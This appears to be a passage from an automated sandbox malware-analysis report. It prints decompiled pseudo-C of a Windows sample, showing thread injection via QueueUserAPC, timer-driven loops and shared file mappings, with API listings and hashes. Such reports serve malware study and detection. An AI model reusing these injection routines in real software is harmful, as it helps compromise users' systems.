                                                                                                                                                                                                                                          					 *0x404138 = _a4;
                                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t10 = _t52 + 2; // 0x2
                                                                                                                                                                                                                                          				_t42 = E00401026(_t52 + _t10);
                                                                                                                                                                                                                                          				 *0x404138 = _t42;
                                                                                                                                                                                                                                          				if(_t42 == 0) {
                                                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				 *_t58(_a4, _t42, _t52); // executed
                                                                                                                                                                                                                                          				E00401938(_a4);
                                                                                                                                                                                                                                          				goto L11;
                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                          0x004011d4
                                                                                                                                                                                                                                          0x004011db
                                                                                                                                                                                                                                          0x004011e2
                                                                                                                                                                                                                                          0x004011e7
                                                                                                                                                                                                                                          0x00401308
                                                                                                                                                                                                                                          0x00401308
                                                                                                                                                                                                                                          0x004011ee
                                                                                                                                                                                                                                          0x004011f6
                                                                                                                                                                                                                                          0x004011fa
                                                                                                                                                                                                                                          0x004011ff
                                                                                                                                                                                                                                          0x0040120a
                                                                                                                                                                                                                                          0x00401210
                                                                                                                                                                                                                                          0x00401213
                                                                                                                                                                                                                                          0x0040121a
                                                                                                                                                                                                                                          0x00401305
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00401305
                                                                                                                                                                                                                                          0x00401220
                                                                                                                                                                                                                                          0x00401224
                                                                                                                                                                                                                                          0x0040127a
                                                                                                                                                                                                                                          0x0040128a
                                                                                                                                                                                                                                          0x00401290
                                                                                                                                                                                                                                          0x0040129a
                                                                                                                                                                                                                                          0x004012f5
                                                                                                                                                                                                                                          0x004012f7
                                                                                                                                                                                                                                          0x004012fa
                                                                                                                                                                                                                                          0x004012fa
                                                                                                                                                                                                                                          0x00401301
                                                                                                                                                                                                                                          0x00401303
                                                                                                                                                                                                                                          0x00401303
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00401301
                                                                                                                                                                                                                                          0x004012a6
                                                                                                                                                                                                                                          0x004012b4
                                                                                                                                                                                                                                          0x004012b6
                                                                                                                                                                                                                                          0x004012ba
                                                                                                                                                                                                                                          0x004012bd
                                                                                                                                                                                                                                          0x004012c4
                                                                                                                                                                                                                                          0x004012c9
                                                                                                                                                                                                                                          0x004012cb
                                                                                                                                                                                                                                          0x004012cb
                                                                                                                                                                                                                                          0x004012d3
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004012d5
                                                                                                                                                                                                                                          0x004012d8
                                                                                                                                                                                                                                          0x004012de
                                                                                                                                                                                                                                          0x004012e3
                                                                                                                                                                                                                                          0x004012ea
                                                                                                                                                                                                                                          0x004012ea
                                                                                                                                                                                                                                          0x004012f1
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004012f1
                                                                                                                                                                                                                                          0x004012d3
                                                                                                                                                                                                                                          0x00401231
                                                                                                                                                                                                                                          0x00401274
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00401274
                                                                                                                                                                                                                                          0x00401233
                                                                                                                                                                                                                                          0x0040123e
                                                                                                                                                                                                                                          0x00401240
                                                                                                                                                                                                                                          0x00401244
                                                                                                                                                                                                                                          0x0040126a
                                                                                                                                                                                                                                          0x0040126d
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0040126d
                                                                                                                                                                                                                                          0x00401246
                                                                                                                                                                                                                                          0x0040124b
                                                                                                                                                                                                                                          0x00401250
                                                                                                                                                                                                                                          0x00401257
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0040125e
                                                                                                                                                                                                                                          0x00401263
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040179C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,004011E0), ref: 004017AB
                                                                                                                                                                                                                                            • Part of subcall function 0040179C: GetVersion.KERNEL32(?,004011E0), ref: 004017BA
                                                                                                                                                                                                                                            • Part of subcall function 0040179C: GetCurrentProcessId.KERNEL32(?,004011E0), ref: 004017D6
                                                                                                                                                                                                                                            • Part of subcall function 0040179C: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,004011E0), ref: 004017EF
                                                                                                                                                                                                                                          • SwitchToThread.KERNEL32 ref: 004011EE
                                                                                                                                                                                                                                            • Part of subcall function 00401B6F: VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00401BC5
                                                                                                                                                                                                                                            • Part of subcall function 00401B6F: memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,004011FF,-00000008), ref: 00401C57
                                                                                                                                                                                                                                            • Part of subcall function 00401B6F: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00401C72
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000,-00000008), ref: 0040120A
                                                                                                                                                                                                                                          • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 0040123E
                                                                                                                                                                                                                                          • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 0040125E
                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 0040128A
                                                                                                                                                                                                                                          • QueueUserAPC.KERNELBASE(004016E4,00000000,?), ref: 004012A6
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004012B6
                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 004012BD
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004012C4
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 004012CB
                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004012D8
                                                                                                                                                                                                                                          • GetExitCodeThread.KERNEL32(00000000,?), ref: 004012EA
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004012F1
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004012F5
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401303
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600128406.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600165940.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600183229.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3896949738-0
                                                                                                                                                                                                                                          • Opcode ID: fd35b077739daf7847114f9f346be5ede622197cae8833bd08c1554a8ffecee1
                                                                                                                                                                                                                                          • Instruction ID: c3a5eca2a66aa5e7bbaa8b49f19a45a5b77f58551790e7c1cf36b2dcd64879de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd35b077739daf7847114f9f346be5ede622197cae8833bd08c1554a8ffecee1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16315071801118BFDB11AFB5DD889AF7EACEB08395710417AF905F72B4D7388E419BA8
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                                          			E01129B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                          				void _v48;
                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                          				struct %anon52 _v60;
                                                                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                                                                          				long _v76;
                                                                                                                                                                                                                                          				void* _v80;
                                                                                                                                                                                                                                          				union _LARGE_INTEGER _v84;
                                                                                                                                                                                                                                          				struct %anon52 _v92;
                                                                                                                                                                                                                                          				void* _v96;
                                                                                                                                                                                                                                          				void* _v100;
                                                                                                                                                                                                                                          				union _LARGE_INTEGER _v104;
                                                                                                                                                                                                                                          				long _v108;
                                                                                                                                                                                                                                          				intOrPtr _v120;
                                                                                                                                                                                                                                          				struct %anon52 _v128;
                                                                                                                                                                                                                                          				struct %anon52 _t46;
                                                                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                                                                          				long _t53;
                                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                                          				struct %anon52 _t60;
                                                                                                                                                                                                                                          				long _t64;
                                                                                                                                                                                                                                          				struct %anon52 _t65;
                                                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                          				void** _t82;
                                                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                                                          				void* _t89;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t75 = __edx;
                                                                                                                                                                                                                                          				_v52 = 0;
                                                                                                                                                                                                                                          				memset( &_v48, 0, 0x2c);
                                                                                                                                                                                                                                          				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                                                                                                                                                                                                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                                                                                                                          				_v60 = _t46;
                                                                                                                                                                                                                                          				if(_t46 == 0) {
                                                                                                                                                                                                                                          					_v92.HighPart = GetLastError();
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_push(0xffffffff);
                                                                                                                                                                                                                                          					_push(0xff676980);
                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                          					_push( *0x112d240);
                                                                                                                                                                                                                                          					_v76 = 0;
                                                                                                                                                                                                                                          					_v80 = 0;
                                                                                                                                                                                                                                          					L0112B088();
                                                                                                                                                                                                                                          					_v84.LowPart = _t46;
                                                                                                                                                                                                                                          					_v80 = _t75;
                                                                                                                                                                                                                                          					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                                                                                                                                                                                                                          					_t51 =  *0x112d26c; // 0x33c
                                                                                                                                                                                                                                          					_v76 = _t51;
                                                                                                                                                                                                                                          					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                                                                                                                                                                                                                          					_v108 = _t53;
                                                                                                                                                                                                                                          					if(_t53 == 0) {
                                                                                                                                                                                                                                          						if(_a8 != 0) {
                                                                                                                                                                                                                                          							L4:
                                                                                                                                                                                                                                          							 *0x112d24c = 5;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t68 = E011268CF(); // executed
                                                                                                                                                                                                                                          							if(_t68 != 0) {
                                                                                                                                                                                                                                          								goto L4;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_v104.LowPart = 0;
                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                          						if(_v104.LowPart == 1 && ( *0x112d260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                          							_v104.LowPart = 2;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t73 = _v104.LowPart;
                                                                                                                                                                                                                                          						_t58 = _t73 << 4;
                                                                                                                                                                                                                                          						_t78 = _t89 + (_t73 << 4) + 0x3c;
                                                                                                                                                                                                                                          						_t74 = _t73 + 1;
                                                                                                                                                                                                                                          						_v92.LowPart = _t73 + 1;
                                                                                                                                                                                                                                          						_t60 = E01129F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
                                                                                                                                                                                                                                          						_v128.LowPart = _t60;
                                                                                                                                                                                                                                          						if(_t60 != 0) {
                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t65 = _v92;
                                                                                                                                                                                                                                          						_v104.LowPart = _t65;
                                                                                                                                                                                                                                          						_t97 = _t65 - 3;
                                                                                                                                                                                                                                          						if(_t65 != 3) {
                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_v120 = E011254AC(_t74, _t97,  &_v72, _a4, _a8);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                                          						L17:
                                                                                                                                                                                                                                          						__eflags = _t60 - 0x10d2;
                                                                                                                                                                                                                                          						if(_t60 != 0x10d2) {
                                                                                                                                                                                                                                          							_push(0xffffffff);
                                                                                                                                                                                                                                          							_push(0xff676980);
                                                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                                                          							_push( *0x112d244);
                                                                                                                                                                                                                                          							goto L21;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							__eflags =  *0x112d248; // 0x0
                                                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                                                          								goto L12;
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								_t60 = E01126106();
                                                                                                                                                                                                                                          								_push(0xffffffff);
                                                                                                                                                                                                                                          								_push(0xdc3cba00);
                                                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                                                          								_push( *0x112d248);
                                                                                                                                                                                                                                          								L21:
                                                                                                                                                                                                                                          								L0112B088();
                                                                                                                                                                                                                                          								_v104.LowPart = _t60;
                                                                                                                                                                                                                                          								_v100 = _t78;
                                                                                                                                                                                                                                          								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                          								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                                                                                                                                                                                                                          								_v128 = _t64;
                                                                                                                                                                                                                                          								__eflags = _t64;
                                                                                                                                                                                                                                          								if(_t64 == 0) {
                                                                                                                                                                                                                                          									goto L6;
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						L25:
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                          					_t82 =  &_v72;
                                                                                                                                                                                                                                          					_t72 = 3;
                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                          						_t54 =  *_t82;
                                                                                                                                                                                                                                          						if(_t54 != 0) {
                                                                                                                                                                                                                                          							HeapFree( *0x112d238, 0, _t54);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t82 =  &(_t82[4]);
                                                                                                                                                                                                                                          						_t72 = _t72 - 1;
                                                                                                                                                                                                                                          					} while (_t72 != 0);
                                                                                                                                                                                                                                          					CloseHandle(_v80);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _v92.HighPart;
                                                                                                                                                                                                                                          				goto L25;
                                                                                                                                                                                                                                          			}
































                                                                                                                                                                                                                                          0x01129b6f
                                                                                                                                                                                                                                          0x01129b85
                                                                                                                                                                                                                                          0x01129b89
                                                                                                                                                                                                                                          0x01129b8e
                                                                                                                                                                                                                                          0x01129b95
                                                                                                                                                                                                                                          0x01129b9b
                                                                                                                                                                                                                                          0x01129ba1
                                                                                                                                                                                                                                          0x01129d29
                                                                                                                                                                                                                                          0x01129ba7
                                                                                                                                                                                                                                          0x01129ba7
                                                                                                                                                                                                                                          0x01129ba9
                                                                                                                                                                                                                                          0x01129bae
                                                                                                                                                                                                                                          0x01129baf
                                                                                                                                                                                                                                          0x01129bb5
                                                                                                                                                                                                                                          0x01129bb9
                                                                                                                                                                                                                                          0x01129bbd
                                                                                                                                                                                                                                          0x01129bcb
                                                                                                                                                                                                                                          0x01129bd9
                                                                                                                                                                                                                                          0x01129bdd
                                                                                                                                                                                                                                          0x01129bdf
                                                                                                                                                                                                                                          0x01129bec
                                                                                                                                                                                                                                          0x01129bf8
                                                                                                                                                                                                                                          0x01129bfa
                                                                                                                                                                                                                                          0x01129c00
                                                                                                                                                                                                                                          0x01129c09
                                                                                                                                                                                                                                          0x01129c14
                                                                                                                                                                                                                                          0x01129c14
                                                                                                                                                                                                                                          0x01129c0b
                                                                                                                                                                                                                                          0x01129c0b
                                                                                                                                                                                                                                          0x01129c12
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129c12
                                                                                                                                                                                                                                          0x01129c1e
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129c22
                                                                                                                                                                                                                                          0x01129c27
                                                                                                                                                                                                                                          0x01129c32
                                                                                                                                                                                                                                          0x01129c32
                                                                                                                                                                                                                                          0x01129c3a
                                                                                                                                                                                                                                          0x01129c45
                                                                                                                                                                                                                                          0x01129c4d
                                                                                                                                                                                                                                          0x01129c56
                                                                                                                                                                                                                                          0x01129c59
                                                                                                                                                                                                                                          0x01129c5d
                                                                                                                                                                                                                                          0x01129c62
                                                                                                                                                                                                                                          0x01129c68
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129c6a
                                                                                                                                                                                                                                          0x01129c6e
                                                                                                                                                                                                                                          0x01129c72
                                                                                                                                                                                                                                          0x01129c75
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129c77
                                                                                                                                                                                                                                          0x01129c87
                                                                                                                                                                                                                                          0x01129c87
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129cb8
                                                                                                                                                                                                                                          0x01129cb8
                                                                                                                                                                                                                                          0x01129cbd
                                                                                                                                                                                                                                          0x01129cdc
                                                                                                                                                                                                                                          0x01129cde
                                                                                                                                                                                                                                          0x01129ce3
                                                                                                                                                                                                                                          0x01129ce4
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129cbf
                                                                                                                                                                                                                                          0x01129cbf
                                                                                                                                                                                                                                          0x01129cc5
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129cc7
                                                                                                                                                                                                                                          0x01129cc7
                                                                                                                                                                                                                                          0x01129ccc
                                                                                                                                                                                                                                          0x01129cce
                                                                                                                                                                                                                                          0x01129cd3
                                                                                                                                                                                                                                          0x01129cd4
                                                                                                                                                                                                                                          0x01129cea
                                                                                                                                                                                                                                          0x01129cea
                                                                                                                                                                                                                                          0x01129cf2
                                                                                                                                                                                                                                          0x01129d00
                                                                                                                                                                                                                                          0x01129d04
                                                                                                                                                                                                                                          0x01129d10
                                                                                                                                                                                                                                          0x01129d12
                                                                                                                                                                                                                                          0x01129d16
                                                                                                                                                                                                                                          0x01129d18
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129d1e
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129d1e
                                                                                                                                                                                                                                          0x01129d18
                                                                                                                                                                                                                                          0x01129cc5
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129cbd
                                                                                                                                                                                                                                          0x01129c8b
                                                                                                                                                                                                                                          0x01129c8d
                                                                                                                                                                                                                                          0x01129c91
                                                                                                                                                                                                                                          0x01129c92
                                                                                                                                                                                                                                          0x01129c92
                                                                                                                                                                                                                                          0x01129c96
                                                                                                                                                                                                                                          0x01129ca0
                                                                                                                                                                                                                                          0x01129ca0
                                                                                                                                                                                                                                          0x01129ca6
                                                                                                                                                                                                                                          0x01129ca9
                                                                                                                                                                                                                                          0x01129ca9
                                                                                                                                                                                                                                          0x01129cb0
                                                                                                                                                                                                                                          0x01129cb0
                                                                                                                                                                                                                                          0x01129d37
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.NTDLL ref: 01129B89
                                                                                                                                                                                                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 01129B95
                                                                                                                                                                                                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 01129BBD
                                                                                                                                                                                                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 01129BDD
                                                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,01124AC4,?), ref: 01129BF8
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,01124AC4,?,00000000), ref: 01129CA0
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01124AC4,?,00000000,?,?), ref: 01129CB0
                                                                                                                                                                                                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 01129CEA
                                                                                                                                                                                                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 01129D04
                                                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01129D10
                                                                                                                                                                                                                                            • Part of subcall function 011268CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05649388,00000000,?,7519F710,00000000,7519F730), ref: 0112691E
                                                                                                                                                                                                                                            • Part of subcall function 011268CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,056493C0,?,00000000,30314549,00000014,004F0053,0564937C), ref: 011269BB
                                                                                                                                                                                                                                            • Part of subcall function 011268CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01129C10), ref: 011269CD
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01124AC4,?,00000000,?,?), ref: 01129D23
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3521023985-0
                                                                                                                                                                                                                                          • Opcode ID: 20ea7e30fcfab0729adf41bd00b53ee9489cd525eba87a8f7a598a327845e306
                                                                                                                                                                                                                                          • Instruction ID: b0803c057251d482aa1dad443f21deb1d848227e9a64f70059f70585c159a5aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20ea7e30fcfab0729adf41bd00b53ee9489cd525eba87a8f7a598a327845e306
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E519B70408334BFD729AF19DC44DAFBBE8EF86328F108A29F9A482144D770C564CB96
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                                                                          			E01121A4E(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                          				struct _FILETIME* _v12;
                                                                                                                                                                                                                                          				short _v56;
                                                                                                                                                                                                                                          				struct _FILETIME* _t12;
                                                                                                                                                                                                                                          				intOrPtr _t13;
                                                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                                                                          				long _t28;
                                                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t27 = __edx;
                                                                                                                                                                                                                                          				_t12 =  &_v12;
                                                                                                                                                                                                                                          				GetSystemTimeAsFileTime(_t12);
                                                                                                                                                                                                                                          				_push(0x192);
                                                                                                                                                                                                                                          				_push(0x54d38000);
                                                                                                                                                                                                                                          				_push(_v8);
                                                                                                                                                                                                                                          				_push(_v12);
                                                                                                                                                                                                                                          				L0112B082();
                                                                                                                                                                                                                                          				_push(_t12);
                                                                                                                                                                                                                                          				_v12 = _t12;
                                                                                                                                                                                                                                          				_t13 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          				_t5 = _t13 + 0x112e836; // 0x5648dde
                                                                                                                                                                                                                                          				_t6 = _t13 + 0x112e59c; // 0x530025
                                                                                                                                                                                                                                          				_push(0x16);
                                                                                                                                                                                                                                          				_push( &_v56);
                                                                                                                                                                                                                                          				_v8 = _t27;
                                                                                                                                                                                                                                          				L0112AD1A();
                                                                                                                                                                                                                                          				_t17 = CreateFileMappingW(0xffffffff, 0x112d2a8, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                                                                                                                          				_t30 = _t17;
                                                                                                                                                                                                                                          				if(_t30 == 0) {
                                                                                                                                                                                                                                          					_t28 = GetLastError();
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					if(GetLastError() == 0xb7) {
                                                                                                                                                                                                                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                          						if(_t21 == 0) {
                                                                                                                                                                                                                                          							_t28 = GetLastError();
                                                                                                                                                                                                                                          							if(_t28 != 0) {
                                                                                                                                                                                                                                          								goto L6;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							 *_a4 = _t30;
                                                                                                                                                                                                                                          							 *_a8 = _t21;
                                                                                                                                                                                                                                          							_t28 = 0;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t28 = 2;
                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                          						CloseHandle(_t30);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t28;
                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                          0x01121a4e
                                                                                                                                                                                                                                          0x01121a56
                                                                                                                                                                                                                                          0x01121a5a
                                                                                                                                                                                                                                          0x01121a60
                                                                                                                                                                                                                                          0x01121a65
                                                                                                                                                                                                                                          0x01121a6a
                                                                                                                                                                                                                                          0x01121a6d
                                                                                                                                                                                                                                          0x01121a70
                                                                                                                                                                                                                                          0x01121a75
                                                                                                                                                                                                                                          0x01121a76
                                                                                                                                                                                                                                          0x01121a79
                                                                                                                                                                                                                                          0x01121a7e
                                                                                                                                                                                                                                          0x01121a85
                                                                                                                                                                                                                                          0x01121a8f
                                                                                                                                                                                                                                          0x01121a91
                                                                                                                                                                                                                                          0x01121a92
                                                                                                                                                                                                                                          0x01121a95
                                                                                                                                                                                                                                          0x01121ab1
                                                                                                                                                                                                                                          0x01121ab7
                                                                                                                                                                                                                                          0x01121abb
                                                                                                                                                                                                                                          0x01121b09
                                                                                                                                                                                                                                          0x01121abd
                                                                                                                                                                                                                                          0x01121aca
                                                                                                                                                                                                                                          0x01121ada
                                                                                                                                                                                                                                          0x01121ae2
                                                                                                                                                                                                                                          0x01121af4
                                                                                                                                                                                                                                          0x01121af8
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01121ae4
                                                                                                                                                                                                                                          0x01121ae7
                                                                                                                                                                                                                                          0x01121aec
                                                                                                                                                                                                                                          0x01121aee
                                                                                                                                                                                                                                          0x01121aee
                                                                                                                                                                                                                                          0x01121acc
                                                                                                                                                                                                                                          0x01121ace
                                                                                                                                                                                                                                          0x01121afa
                                                                                                                                                                                                                                          0x01121afb
                                                                                                                                                                                                                                          0x01121afb
                                                                                                                                                                                                                                          0x01121aca
                                                                                                                                                                                                                                          0x01121b10

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,01124996,?,?,4D283A53,?,?), ref: 01121A5A
                                                                                                                                                                                                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 01121A70
                                                                                                                                                                                                                                          • _snwprintf.NTDLL ref: 01121A95
                                                                                                                                                                                                                                          • CreateFileMappingW.KERNELBASE(000000FF,0112D2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 01121AB1
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01124996,?,?,4D283A53,?), ref: 01121AC3
                                                                                                                                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 01121ADA
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,01124996,?,?,4D283A53), ref: 01121AFB
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01124996,?,?,4D283A53,?), ref: 01121B03
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
